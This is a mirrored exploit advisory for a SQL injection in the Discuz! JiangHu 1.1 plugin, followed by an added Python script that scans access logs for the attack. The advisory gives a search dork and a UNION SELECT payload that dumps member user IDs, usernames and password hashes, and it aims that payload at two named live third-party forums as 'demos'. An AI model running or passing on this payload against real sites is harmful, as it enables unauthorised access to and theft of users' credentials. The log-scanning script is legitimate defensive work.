Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009090017

Below is a copy:

=========================================================
Discuz! Plugin JiangHu <= 1.1 SQL Injection Vulnerability
=========================================================

========================[Author]=========================

 [+] Found by: ZhaoHuAn
 [+] Contact: ZhengXing[at]shandagames[dot]com
 [+] Blog: http://www.patching.net/zhaohuan/
 [+] Date: Feb, 9th 2009
 [+] Update: Sep, 1st 2009
 
========================[Soft Info]====================== 
 
Software: Discuz! Plugin JiangHu Inn         
Version: 1.1                 
Vendor: http://www.discuz.com
d0rk    : inurl:forummission.php              



[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SQLi PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
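
Added example (not part of the original advisory): a defender-side access-log check for the request pattern shown above. It flags requests to forummission.php whose id parameter is not a plain integer (the legitimate form is id=24); the combined log format, the sample lines and all function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Keywords that appear in the advisory's payload; used only to label a finding.
SQL_HINTS = re.compile(r"\b(union|select|group_concat|from)\b|--", re.I)
INTEGER_RE = re.compile(r"[0-9]+")

def check_line(line):
    """Return a finding dict for a suspicious forummission.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/forummission.php"):
        return None
    # parse_qs decodes %XX and '+' the same way PHP does when filling $_GET.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("id", []):
        if not INTEGER_RE.fullmatch(value):   # anything but digits is anomalous
            return {
                "client": line.split(" ", 1)[0],
                "id": value,
                "sql_keywords": bool(SQL_HINTS.search(value)),
            }
    return None

def scan(lines):
    """Return findings for every flagged line, in input order."""
    return [f for f in map(check_line, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2009:10:00:00 +0000] "GET /bbs/forummission.php?index=show&id=24 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Sep/2009:10:00:05 +0000] "GET /bbs/forummission.php?index=show&id=24%20and+1=2+union+select+1,2,3 HTTP/1.1" 200 7301',
    '198.51.100.7 - - [01/Sep/2009:10:00:09 +0000] "GET /bbs/forummission.php?index=show&id=24%27 HTTP/1.1" 200 310',
    '192.0.2.10 - - [01/Sep/2009:10:00:11 +0000] "GET /bbs/index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The check only sees the request line, so a POST body carrying the same parameter would need application-level or WAF logging to be covered.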
